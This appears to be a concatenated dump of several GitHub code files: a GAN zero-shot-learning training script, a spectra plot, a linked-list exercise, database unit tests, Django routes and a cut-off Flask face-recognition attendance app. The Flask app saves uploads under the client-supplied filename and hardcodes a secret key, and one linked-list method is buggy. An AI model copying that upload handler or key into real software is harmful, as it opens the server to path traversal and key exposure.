default='res101')\nparser.add_argument('--class_embedding', default='att')\nparser.add_argument('--syn_num', type=int, default=100, help='number features to generate per class')\nparser.add_argument('--gzsl', action='store_true', default=False, help='enable generalized zero-shot learning')\nparser.add_argument('--preprocessing', action='store_true', default=False,\n help='enbale MinMaxScaler on visual features')\nparser.add_argument('--standardization', action='store_true', default=False)\nparser.add_argument('--validation', action='store_true', default=False, help='enable cross validation mode')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=2)\nparser.add_argument('--batch_size', type=int, default=64, help='input batch size')\nparser.add_argument('--resSize', type=int, default=2048, help='size of visual features')\nparser.add_argument('--attSize', type=int, default=1024, help='size of semantic features')\nparser.add_argument('--nz', type=int, default=312, help='size of the latent z vector')\nparser.add_argument('--ngh', type=int, default=4096, help='size of the hidden units in generator')\nparser.add_argument('--ndh', type=int, default=1024, help='size of the hidden units in discriminator')\nparser.add_argument('--nepoch', type=int, default=2000, help='number of epochs to train for')\nparser.add_argument('--critic_iter', type=int, default=5, help='critic iteration, following WGAN-GP')\nparser.add_argument('--lambda1', type=float, default=10, help='gradient penalty regularizer, following WGAN-GP')\nparser.add_argument('--cls_weight', type=float, default=1, help='weight of the classification loss')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate to train GANs ')\nparser.add_argument('--classifier_lr', type=float, default=0.001, help='learning rate to train softmax classifier')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', default=False, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--pretrain_classifier', default='', help=\"path to pretrain classifier (to continue training)\")\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='', help=\"path to netD (to continue training)\")\nparser.add_argument('--netG_name', default='')\nparser.add_argument('--netD_name', default='')\nparser.add_argument('--outf', default='./checkpoint/', help='folder to output data and model checkpoints')\nparser.add_argument('--outname', help='folder to output data and model checkpoints')\nparser.add_argument('--save_every', type=int, default=100)\nparser.add_argument('--print_every', type=int, default=1)\nparser.add_argument('--val_every', type=int, default=10)\nparser.add_argument('--start_epoch', type=int, default=0)\nparser.add_argument('--manualSeed', type=int, help='manual seed')\nparser.add_argument('--nclass_all', type=int, default=200, help='number of all classes')\nparser.add_argument('--ratio', type=float, default=0.2, help='ratio of easy samples')\nparser.add_argument('--proto_param1', type=float, default=0.01, help='proto param 1')\nparser.add_argument('--proto_param2', type=float, default=0.01, help='proto param 2')\nparser.add_argument('--loss_syn_num', type=int, default=20, help='number of real clusters')\nparser.add_argument('--n_clusters', type=int, default=3, help='number of real clusters')\n\n\ndef GetNowTime():\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()))\n\nprint(GetNowTime())\nprint('Begin run!!!')\nsince = time.time()\n\nopt = parser.parse_args()\nprint('Params: dataset={:s}, GZSL={:s}, ratio={:.1f}, cls_weight={:.4f}, proto_param1={:.4f}, proto_param2={:.4f}'.format(\n opt.dataset, str(opt.gzsl), opt.ratio, opt.cls_weight,opt.proto_param1, opt.proto_param2))\nsys.stdout.flush()\n\nif opt.manualSeed is None:\n opt.manualSeed = random.randint(1, 10000)\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\nif opt.cuda:\n torch.cuda.manual_seed_all(opt.manualSeed)\n\ncudnn.benchmark = True\n\nif torch.cuda.is_available() and not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n# load data\ndata = util.DATA_LOADER(opt)\nprint(\"Training samples: \", data.ntrain)\n\n# initialize generator and discriminator\nnetG = model.MLP_G(opt)\nif opt.netG != '':\n netG.load_state_dict(torch.load(opt.netG))\n# print(netG)\n\nnetD = model.MLP_CRITIC(opt)\nif opt.netD != '':\n netD.load_state_dict(torch.load(opt.netD))\n# print(netD)\n\n# classification loss, Equation (4) of the paper\ncls_criterion = nn.NLLLoss()\n\ninput_res = torch.FloatTensor(opt.batch_size, opt.resSize)\ninput_att = torch.FloatTensor(opt.batch_size, opt.attSize)\nnoise = torch.FloatTensor(opt.batch_size, opt.nz)\none = torch.FloatTensor([1])\nmone = one * -1\ninput_label = torch.LongTensor(opt.batch_size)\n\nif opt.cuda:\n netD.cuda()\n netG.cuda()\n input_res = input_res.cuda()\n noise, input_att = noise.cuda(), input_att.cuda()\n one = one.cuda()\n mone = mone.cuda()\n cls_criterion.cuda()\n input_label = input_label.cuda()\n\n\ndef sample():\n batch_feature, batch_label, batch_att = data.next_batch(opt.batch_size)\n input_res.copy_(batch_feature)\n input_att.copy_(batch_att)\n input_label.copy_(util.map_label(batch_label, data.seenclasses))\n\n\ndef generate_syn_feature(netG, classes, attribute, num):\n nclass = classes.size(0)\n syn_feature = torch.FloatTensor(nclass * num, opt.resSize)\n syn_label = torch.LongTensor(nclass * num)\n syn_att = torch.FloatTensor(num, opt.attSize)\n syn_noise = torch.FloatTensor(num, opt.nz)\n if opt.cuda:\n syn_att = syn_att.cuda()\n syn_noise = syn_noise.cuda()\n\n for i in range(nclass):\n iclass = classes[i]\n iclass_att = attribute[iclass]\n syn_att.copy_(iclass_att.repeat(num, 1))\n syn_noise.normal_(0, 1)\n output = netG(Variable(syn_noise, volatile=True), Variable(syn_att, volatile=True))\n syn_feature.narrow(0, i * num, num).copy_(output.data.cpu())\n syn_label.narrow(0, i * num, num).fill_(iclass)\n\n return syn_feature, syn_label\n\ndef generate_syn_feature_with_grad(netG, classes, attribute, num):\n nclass = classes.size(0)\n # syn_feature = torch.FloatTensor(nclass*num, opt.resSize)\n syn_label = torch.LongTensor(nclass * num)\n syn_att = torch.FloatTensor(nclass * num, opt.attSize)\n syn_noise = torch.FloatTensor(nclass * num, opt.nz)\n if opt.cuda:\n syn_att = syn_att.cuda()\n syn_noise = syn_noise.cuda()\n syn_label = syn_label.cuda()\n syn_noise.normal_(0, 1)\n for i in range(nclass):\n iclass = classes[i]\n iclass_att = attribute[iclass]\n syn_att.narrow(0, i * num, num).copy_(iclass_att.repeat(num, 1))\n syn_label.narrow(0, i * num, num).fill_(iclass)\n syn_feature = netG(Variable(syn_noise), Variable(syn_att))\n return syn_feature, syn_label.cpu()\n\ndef map_label(label, classes):\n mapped_label = torch.LongTensor(label.size())\n for i in range(classes.size(0)):\n mapped_label[label==classes[i]] = i\n\n return mapped_label\n\n\ndef pairwise_distances(x, y=None):\n '''\n Input: x is a Nxd matrix\n y is an optional Mxd matirx\n Output: dist is a NxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]\n if y is not given then use 'y=x'.\n i.e. dist[i,j] = ||x[i,:]-y[j,:]||^2\n '''\n x_norm = (x ** 2).sum(1).view(-1, 1)\n if y is not None:\n y_t = torch.transpose(y, 0, 1)\n y_norm = (y ** 2).sum(1).view(1, -1)\n else:\n y_t = torch.transpose(x, 0, 1)\n y_norm = x_norm.view(1, -1)\n\n dist = x_norm + y_norm - 2.0 * torch.mm(x, y_t)\n # Ensure diagonal is zero if x=y\n if y is None:\n dist = dist - torch.diag(dist.diag)\n return torch.clamp(dist, 0.0, np.inf)\n\n# setup optimizer\noptimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\noptimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n\n\ndef calc_gradient_penalty(netD, real_data, fake_data, input_att):\n # print real_data.size()\n alpha = torch.rand(opt.batch_size, 1)\n alpha = alpha.expand(real_data.size())\n if opt.cuda:\n alpha = alpha.cuda()\n\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n\n if opt.cuda:\n interpolates = interpolates.cuda()\n\n interpolates = Variable(interpolates, requires_grad=True)\n\n disc_interpolates = netD(interpolates, Variable(input_att))\n\n ones = torch.ones(disc_interpolates.size())\n if opt.cuda:\n ones = ones.cuda()\n\n gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=ones,\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * opt.lambda1\n return gradient_penalty\n\n\n# train a classifier on seen classes, obtain \\theta of Equation (4)\npretrain_cls = classifier.CLASSIFIER(data.train_feature, util.map_label(data.train_label, data.seenclasses),\n data.seenclasses.size(0), opt.resSize, opt.cuda, 0.001, 0.5, 100, 100,\n opt.pretrain_classifier)\n\n# freeze the classifier during the optimization\nfor p in pretrain_cls.model.parameters(): # set requires_grad to False\n p.requires_grad = False\n\nfor epoch in range(opt.nepoch):\n FP = 0\n mean_lossD = 0\n mean_lossG = 0\n\n for i in range(0, data.ntrain, opt.batch_size):\n\n for p in netD.parameters():\n p.requires_grad = True\n\n for iter_d in range(opt.critic_iter):\n sample()\n netD.zero_grad()\n sparse_real = opt.resSize - input_res[1].gt(0).sum()\n input_resv = Variable(input_res)\n input_attv = Variable(input_att)\n\n criticD_real = netD(input_resv, input_attv)\n criticD_real = criticD_real.mean()\n criticD_real.backward(mone)\n\n noise.normal_(0, 1)\n noisev = Variable(noise)\n fake = netG(noisev, input_attv)\n fake_norm = fake.data[0].norm()\n sparse_fake = fake.data[0].eq(0).sum()\n criticD_fake = netD(fake.detach(), input_attv)\n criticD_fake = criticD_fake.mean()\n criticD_fake.backward(one)\n\n gradient_penalty = calc_gradient_penalty(netD, input_res, fake.data, input_att)\n gradient_penalty.backward()\n\n Wasserstein_D = criticD_real - criticD_fake\n D_cost = criticD_fake - criticD_real + gradient_penalty\n optimizerD.step()\n\n for p in netD.parameters(): # reset requires_grad\n p.requires_grad = False # avoid computation\n\n netG.zero_grad()\n input_attv = Variable(input_att)\n noise.normal_(0, 1)\n noisev = Variable(noise)\n fake = netG(noisev, input_attv)\n criticG_fake = netD(fake, input_attv)\n criticG_fake = criticG_fake.mean()\n G_cost = -criticG_fake\n # classification loss\n c_errG = cls_criterion(pretrain_cls.model(fake), Variable(input_label))\n\n labels = Variable(input_label.view(opt.batch_size, 1))\n real_proto = Variable(data.real_proto.cuda())\n dists1 = pairwise_distances(fake,real_proto)\n min_idx1 = torch.zeros(opt.batch_size, data.train_cls_num)\n for i in range(data.train_cls_num):\n min_idx1[:,i] = torch.min(dists1.data[:,i*opt.n_clusters:(i+1)*opt.n_clusters],dim=1)[1] + i*opt.n_clusters\n min_idx1 = Variable(min_idx1.long().cuda())\n loss2 = dists1.gather(1,min_idx1).gather(1,labels).squeeze().view(-1).mean()\n\n seen_feature, seen_label = generate_syn_feature_with_grad(netG, data.seenclasses, data.attribute,opt.loss_syn_num)\n seen_mapped_label = map_label(seen_label, data.seenclasses)\n transform_matrix = torch.zeros(data.train_cls_num, seen_feature.size(0)) # 150x7057\n for i in range(data.train_cls_num):\n sample_idx = (seen_mapped_label == i).nonzero().squeeze()\n if sample_idx.numel() == 0:\n continue\n else:\n cls_fea_num = sample_idx.numel()\n transform_matrix[i][sample_idx] = 1 / cls_fea_num * torch.ones(1, cls_fea_num).squeeze()\n transform_matrix = Variable(transform_matrix.cuda())\n fake_proto = torch.mm(transform_matrix, seen_feature) # 150x2048\n dists2 = pairwise_distances(fake_proto,Variable(data.real_proto.cuda())) # 150 x 450\n min_idx2 = torch.zeros(data.train_cls_num, data.train_cls_num)\n for i in range(data.train_cls_num):\n min_idx2[:,i] = torch.min(dists2.data[:,i*opt.n_clusters:(i+1)*opt.n_clusters],dim=1)[1] + i*opt.n_clusters\n min_idx2 = Variable(min_idx2.long().cuda())\n lbl_idx = Variable(torch.LongTensor(list(range(data.train_cls_num))).cuda())\n loss1 = dists2.gather(1,min_idx2).gather(1,lbl_idx.unsqueeze(1)).squeeze().mean()\n\n errG = G_cost + opt.cls_weight * c_errG + opt.proto_param2 * loss2 + opt.proto_param1 * loss1\n errG.backward()\n optimizerG.step()\n\n print('EP[%d/%d]************************************************************************************' % (\n epoch, opt.nepoch))\n\n # evaluate the model, set G to evaluation mode\n netG.eval()\n # Generalized zero-shot learning\n if opt.gzsl:\n syn_feature, syn_label = generate_syn_feature(netG, data.unseenclasses, data.attribute, opt.syn_num)\n train_X = torch.cat((data.train_feature, syn_feature), 0)\n train_Y = torch.cat((data.train_label, syn_label), 0)\n nclass = opt.nclass_all\n cls = classifier2.CLASSIFIER(train_X, train_Y, data, nclass, opt.cuda, opt.classifier_lr, 0.5, 50, 2*opt.syn_num,True)\n # print('unseen=%.4f, seen=%.4f, h=%.4f' % (cls.acc_unseen, cls.acc_seen, cls.H))\n # Zero-shot learning\n else:\n syn_feature, syn_label = generate_syn_feature(netG, data.unseenclasses, data.attribute, opt.syn_num)\n cls = classifier2.CLASSIFIER(syn_feature, util.map_label(syn_label, data.unseenclasses), data,\n data.unseenclasses.size(0), opt.cuda, opt.classifier_lr, 0.5, 50, 2*opt.syn_num,\n False, opt.ratio, epoch)\n # acc = cls.acc\n # print('unseen class accuracy= ', cls.acc)\n del cls\n cls = None\n # reset G to training mode\n netG.train()\n sys.stdout.flush()\n\ntime_elapsed = time.time() - since\nprint('End run!!!')\nprint('Time Elapsed: {}'.format(time_elapsed))\nprint(GetNowTime())","repo_name":"lijin118/LisGAN","sub_path":"lisgan.py","file_name":"lisgan.py","file_ext":"py","file_size_in_byte":15606,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"54"} +{"seq_id":"18762471566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 28 17:44:16 2021\n\n@author: paclk\n\"\"\"\nimport os\n\nimport numpy as np\nimport xarray as xr\n\nimport matplotlib.pyplot as plt\n\n\n# dir = 'C:/Users/paclk/OneDrive - University of Reading/ug_project_data/Data/'\n# file = 'diagnostics_3d_ts_21600.nc'\n# dx = 50.0\n# dy = 50.0\n\n\ndir = 'C:/Users/paclk/OneDrive - University of Reading/traj_data/CBL/'\nfile = 'diagnostics_3d_ts_13200.nc'\ndx = 5.0\ndy = 5.0\n\n# Set up outfile\noutdir = os.path.join(dir, 'spectra/')\nos.makedirs(outdir, exist_ok = True) # make outdir if it doesn't already exist\nouttag = \"spectra_w_2D\"\noutfile = os.path.join(outdir,('.').join(os.path.basename(file).split('.')[:-1]) + \"_\"+outtag+\".nc\")\n\n\ndso = xr.open_dataset(outfile)\nk = dso['hfreq']\nkx = dso['xfreq']\nky = dso['yfreq']\nkE_k = k * dso['spec_2d_w']\nkE_kx = kx * dso['spec_xdir_w']\nkE_ky = ky * dso['spec_ydir_w']\n\n#kE_k = k * dso['spec_2d_u']\n\n\nkE_kp = kE_k.mean(dim='time').sel(z=600, method='nearest')\nkE_kp.plot(xscale='log', yscale='log')\n\nkE_kxp = kE_kx.mean(dim='time').sel(z=600, method='nearest')\nkE_kxp.plot(xscale='log', yscale='log')\nkE_kyp = kE_ky.mean(dim='time').sel(z=600, method='nearest')\nkE_kyp.plot(xscale='log', yscale='log')\n\n#plt.ylim([0.0001,1])\n#plt.xlim([0.0001,0.1])\nplt.ylabel('kE(k)')\nplt.tight_layout()\nax=plt.gca()\n\nxr = ax.get_xlim()\nyr = ax.get_ylim()\n\n#k = kx\n#kE_kp = kE_kxp\n\ni = kE_kp.argmax()\nif i.size > 1:\n i = i[0]\n\nymax = kE_kp[i]\nx_ymax = k[i]\n\nyidl = lambda x : ymax.values * (x / x_ymax.values)**(-2/3)\n\nplt.plot(xr, yidl(xr))\n\n\ndso.close()\n\n\n","repo_name":"ReadingClouds/Subfilter","sub_path":"examples/spectra_plot.py","file_name":"spectra_plot.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32610561984","text":"\nclass Nodes:\n def __init__(self, data1):\n self.data = data1\n self.next = None\n\n\nclass Linklist:\n def __init__(self):\n self.start = None\n\n def addnode(self, data):\n new_node = Nodes(data)\n if self.start is None:\n self.start = new_node\n else:\n temp = self.start\n while temp.next:\n temp = temp.next\n temp.next = new_node\n\n def display(self):\n temp = self.start\n while temp is not None:\n print(temp.data)\n temp = temp.next\n def swap_node(self):\n count = 1\n temp = self.start\n temp1 = self.start\n num1 = int(input(\"enter first node to be swapped\"))\n num2 = int(input(\"enter second node to be swapped\"))\n while (count < num1 - 1):\n temp = temp.next\n count +=1\n count = 1\n while (count < num2 - 1):\n temp1 = temp1.next\n count +=1\n a=[]\n a[0] = temp.next\n a[1] = temp.next.next\n a[2] = temp1.next\n a[3] = temp1.next.next\n temp.next.next = a[3]\n temp1.next.next = a[1]\n temp.next = a[2]\n temp1.next = a[0]\n\n def swapNodes(self ):\n\n x=int(input(\"enter the first node:-\"))\n y=int(input(\"enter the second node:-\"))\n if x == y:\n return\n temp1 = self.start\n temp=None\n while temp1.data != x:\n temp = temp1\n temp1 = temp1.next\n\n temp3 = self.start\n temp2 = None\n while temp3.data != y:\n temp2 = temp3\n temp3 = temp3.next\n if temp != None:\n temp.next = temp3\n else:\n self.start = temp3\n if temp2 != None:\n temp2.next = temp1\n else:\n self.start = temp1\n temp5 = temp1.next\n temp1.next = temp3.next\n temp3.next = temp5\n\n\nl = Linklist()\ncount=int(input(\"enter the total no of node\"))\nfor i in range(count):\n new_data = int(input(\"enter the data-\"))\n l.addnode(new_data)\nl.display()\nl.swapNodes()\nl.display()\n\n","repo_name":"Shivam4819/python","sub_path":"node_swap.py","file_name":"node_swap.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16440743333","text":"import logging\nimport os\nimport tempfile\nimport time\nimport unittest2 as unittest\n\nimport redis\nfrom mock import patch, call, Mock\nimport MySQLdb\n\nimport trends.db as db\nimport trends.exceptions as exceptions\n \nlogging.basicConfig(filename='log_test_db.txt',level=logging.DEBUG)\n\nclass DbTest(unittest.TestCase):\n\n def setUp(self):\n self.db = db.Db()\n self.cfg_mysql_host = 'test_mysql_host'\n self.cfg_mysql_user = 'test_mysql_user'\n self.cfg_mysql_password = 'test_mysql_password'\n self.cfg_mysql_db = 'test_mysql_db'\n self.cfg_twitter_userid = 'test_twitter_userid'\n self.cfg_twitter_password = 'test_twitter_password'\n self.cfg_redis_host = 'test_redis_host'\n self.cfg_redis_port = 1\n self.cfg_rabbitmq_host = 'test_rabbitmq_host'\n self.cfg_rabbitmq_userid = 'test_rabbitmq_userid'\n self.cfg_rabbitmq_password = 'test_rabbitmq_password'\n\n @patch('redis.Redis')\n def test_setup_redis(self, redis_class_mock):\n redis_instance = 'test_redis_instance' \n redis_class_mock.return_value = redis_instance\n self.db.setup_redis()\n call_args_list = redis_class_mock.call_args_list\n expected = [call(host = self.cfg_redis_host,\n port = self.cfg_redis_port, db = 0),\n call(host = self.cfg_redis_host,\n port = self.cfg_redis_port, db = 1)]\n self.assertListEqual(call_args_list, expected)\n self.assertEqual(call_args_list, expected)\n self.assertIs(self.db.db_mem, redis_instance)\n self.assertIs(self.db.db_mem_posts, redis_instance)\n\n @patch.object(MySQLdb, 'connect')\n def test_setup_mysql(self, connect_mock):\n mock = Mock()\n connect_mock.return_value = mock\n cursor = 'test_cursor'\n mock.cursor.return_value = cursor\n self.db.setup_mysql()\n connect_mock.assert_called_once_with(host=self.cfg_mysql_host,\n passwd=self.cfg_mysql_password,\n charset='utf8', db=self.cfg_mysql_db, user=self.cfg_mysql_user,\n use_unicode=True)\n self.assertTrue(mock.cursor.called)\n self.assertIs(self.db.db_disk_posts, mock)\n self.assertIs(self.db.db_cursor, cursor)\n\n @patch.object(MySQLdb, 'connect')\n def test_setup_mysql_connect_error(self, connect_mock):\n connect_mock.side_effect = MySQLdb.Error()\n self.assertRaises(exceptions.DbError, self.db.setup_mysql)\n\n @patch.object(db.Db, 'setup_mysql')\n def test_setup_mysql_loop(self, setup_mysql_mock):\n self.db.retries = 1\n self.db.setup_mysql_loop()\n self.assertTrue(setup_mysql_mock.called)\n\n @patch.object(db.Db, 'setup_mysql')\n @patch.object(time, 'sleep')\n def test_setup_mysql_loop_db_error(self, time_sleep_mock, setup_mysql_mock):\n self.db.retries = 2\n self.db.retry_wait = 0.1\n setup_mysql_mock.side_effect = exceptions.DbError() \n self.assertRaises(exceptions.DbError, self.db.setup_mysql_loop) \n self.assertEqual(setup_mysql_mock.call_count, 2)\n self.assertEqual(time_sleep_mock.call_count, 2)\n\n @patch.object(db.Db, 'db_mem')\n def test_redis_command_db_0(self, db_mem_mock):\n db_mem_mock.get.return_value = 'test'\n r = self.db.redis_command(0, 'get', 'test_key')\n db_mem_mock.get.assert_called_once_with('test_key')\n self.assertEqual(r, 'test')\n\n @patch.object(db.Db, 'db_mem_posts')\n def test_redis_command_db_1(self, db_mem_posts_mock):\n db_mem_posts_mock.get.return_value = 'test'\n r = self.db.redis_command(1, 'get', 'test_key')\n db_mem_posts_mock.get.assert_called_once_with('test_key')\n self.assertEqual(r, 'test')\n\n @patch.object(db.Db, 'db_mem')\n def test_redis_command_redis_error(self, db_mem_mock):\n self.db.cmd_retries = 2\n self.db.cmd_retry_wait = 0.1\n db_mem_mock.get.side_effect = redis.exceptions.RedisError()\n self.assertRaises(exceptions.DbError,\n self.db.redis_command,\n 0, 'get', 'test_key')\n db_mem_mock.get.assert_called_with('test_key')\n self.assertEqual(db_mem_mock.get.call_count, 2)\n\n @patch.object(db.Db, 'db_mem')\n def test_redis_command_attribute_error(self, db_mem_mock):\n db_mem_mock.get.side_effect = AttributeError()\n self.assertRaises(exceptions.DbError,\n self.db.redis_command,\n 0, 'get', 'test_key')\n db_mem_mock.get.assert_called_once_with('test_key')\n \n @patch.object(db.Db, 'db_disk_posts')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command(self, db_cursor_mock, db_disk_posts_mock):\n db_cursor_mock.fetchall.return_value = ((1,2,3))\n r = self.db.mysql_command('execute', 'test_sql', False, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n self.assertTrue(db_cursor_mock.fetchall.called)\n self.assertFalse(db_disk_posts_mock.commit.called)\n self.assertEqual(r, ((1,2,3)))\n\n @patch.object(db.Db, 'db_disk_posts')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_writer(self, db_cursor_mock, db_disk_posts_mock):\n db_cursor_mock.execute.return_value = 2\n r = self.db.mysql_command('execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n self.assertTrue(db_disk_posts_mock.commit.called)\n self.assertEqual(r, 2)\n\n @patch.object(db.Db, 'setup_mysql_loop')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_operational_error(self, db_cursor_mock,\n setup_mysql_loop_mock):\n db_cursor_mock.execute.side_effect = MySQLdb.OperationalError()\n setup_mysql_loop_mock.side_effect = exceptions.DbError()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n\n @patch.object(db.Db, 'setup_mysql_loop')\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_internal_error(self, db_cursor_mock,\n setup_mysql_loop_mock):\n db_cursor_mock.execute.side_effect = MySQLdb.InternalError()\n setup_mysql_loop_mock.side_effect = exceptions.DbError()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_once_with(\n 'test_sql', ('test_arg',))\n\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_internal_error(self, db_cursor_mock):\n self.db.cmd_retries = 2\n self.db.cmd_retry_wait = 0.1\n db_cursor_mock.execute.side_effect = MySQLdb.Error()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_with(\n 'test_sql', ('test_arg',))\n self.assertEqual(db_cursor_mock.execute.call_count, 2)\n\n @patch.object(db.Db, 'db_cursor')\n def test_mysql_command_attribute_error(self, db_cursor_mock):\n db_cursor_mock.execute.side_effect = AttributeError()\n self.assertRaises(exceptions.DbError,\n self.db.mysql_command,\n 'execute', 'test_sql', True, 'test_arg')\n db_cursor_mock.execute.assert_called_with(\n 'test_sql', ('test_arg',))\n\n @patch.object(db.Db, 'redis_cmd')\n def test_get_persons(self, redis_cmd_mock):\n data = (('1:test_first_name_1:test_name_1:test_nickname_1:2:'\\\n '[\\\"test_word_1\\\", \\\"test_word_2\\\"]'), \n ('3:test_first_name_2:test_name_2:test_nickname_2:4:'\\\n '[\\\"test_word_3\\\", \\\"test_word_4\\\"]'))\n redis_cmd_mock.return_value = data\n r = self.db.get_persons()\n self.assertDictEqual(r[0],\n {'id': 1, 'first_name': 'test_first_name_1', 'name': 'test_name_1',\n 'nickname': 'test_nickname_1', 'group': 2, 'rel': {},\n 'posts_count': 0,\n 'words': ['test_word_1', 'test_word_2']})\n self.assertDictEqual(r[1],\n {'id': 3, 'first_name': 'test_first_name_2', 'name': 'test_name_2',\n 'nickname': 'test_nickname_2', 'group': 4, 'rel': {},\n 'posts_count': 0,\n 'words': ['test_word_3', 'test_word_4']})\n redis_cmd_mock.assert_called_once_with('lrange', 'persons', 0, -1)\n \n @patch.object(db.Db, 'redis_cmd')\n def test_set_persons(self, redis_cmd_mock):\n with open('names.txt', 'w') as f:\n f.write('test_name_1\\ntest_name_2\\n')\n self.db.set_persons()\n self.assertEqual(redis_cmd_mock.call_args_list,\n [call('delete', 'persons'), call('rpush', 'persons', 'test_name_1'),\n call('rpush', 'persons', 'test_name_2')]) \n os.remove('names.txt')\n \n @patch.object(db.Db, 'set')\n @patch.object(db.Db, 'sql_write')\n def test_set_post_redis(self, sql_write_mock, set_mock):\n post_id = 2\n value = 'test_value'\n self.db.posts_tid = 1\n self.db.set_post(post_id, value)\n set_mock.assert_called_once_with('post:%d' % (post_id), value, db=1)\n self.assertFalse(sql_write_mock.called)\n\n @patch.object(db.Db, 'set')\n @patch.object(db.Db, 'sql_write')\n def test_set_post_sql(self, sql_write_mock, set_mock):\n post_id = 1\n value = 'test_value'\n self.db.posts_tid = 2\n self.db.set_post(post_id, value)\n sql = 'insert into tp_post(post_id, post) values(%s, %s)'\\\n 'on duplicate key update post=%s'\n sql_write_mock.assert_called_once_with(sql, post_id, value, value)\n self.assertFalse(set_mock.called)\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vgoklani/pytolab-trends","sub_path":"trends/test/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":9932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14361381398","text":"from django.urls import path\nfrom messagebot import views\n\nurlpatterns = [\n path('', views.hello_world, name='hello_world'),\n path('help', views.help, name='help'),\n path('display',views.display,name=\"display\"),\n path('schedule',views.schedule_event,name=\"schedule_event\"),\n path('message',views.get_message,name=\"get_message\"),\n path('sendmessage',views.send_message,name=\"send_message\"),\n]","repo_name":"mundohbl2020/schedule_messages","sub_path":"messagebot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29082869081","text":"from flask import Flask,flash,redirect,url_for,render_template,request\r\nimport cv2\r\nimport urllib.request\r\nimport numpy as np\r\nimport face_recognition\r\nfrom datetime import datetime\r\nimport os\r\nimport pandas as pd\r\nfrom werkzeug.utils import secure_filename\r\n\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nUPLOAD_FOLDER = 'attendance_images'\r\n\r\napp.config['SECRET_KEY'] = 'dineshchakri'\r\napp.config['UPLOAD_PATH'] = 'attendance_images'\r\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024\r\n\r\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}\r\n\r\ndf = pd.read_csv('attendance.csv')\r\n\r\n\r\n@app.route('/show_data', methods=(\"POST\", \"GET\"))\r\ndef showData():\r\n # Convert pandas dataframe to html table flask\r\n df_html = df.to_html()\r\n return render_template('index.html', data=df_html)\r\n\r\n\r\n@app.route('/', methods=[\"GET\"])\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/Upload',methods=[\"GET\",\"POST\"])\r\ndef upload_file():\r\n if request.method == 'POST' :\r\n f = request.files['file-name']\r\n f.save(os.path.join(app.config['UPLOAD_PATH'],f.filename))\r\n return render_template('index.html' , msg=\"file uploaded successfully\")\r\n return render_template('index.html',msg=\"please choose a file\")\r\n\r\n@app.route('/detection')\r\ndef Attendance():\r\n\r\n path = 'attendance_images'\r\n images = []\r\n classNames = []\r\n x = \" \"\r\n myList = os.listdir(path)\r\n print(myList)\r\n for cl in myList:\r\n curImg = cv2.imread(f'{path}/{cl}')\r\n images.append(curImg)\r\n classNames.append(os.path.splitext(cl)[0])\r\n print(classNames)\r\n\r\n def findEncodings(image):\r\n encodeList = []\r\n for img in image:\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode)\r\n return encodeList\r\n\r\n def mark_attendance(name):\r\n with open('attendance.csv','r+') as f:\r\n myDataList = f.readlines()\r\n namelist = []\r\n for line in myDataList:\r\n entry = line.split(',')\r\n namelist.append(entry[0])\r\n if name not in namelist:\r\n now = datetime.now()\r\n dtString = now.strftime('%H:%M:%S')\r\n f.writelines(f'\\n{name},{dtString}')\r\n\r\n encodeListKnown = findEncodings(images)\r\n print('encoding complete')\r\n\r\n cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\r\n\r\n while True:\r\n success, img = cap.read()\r\n if 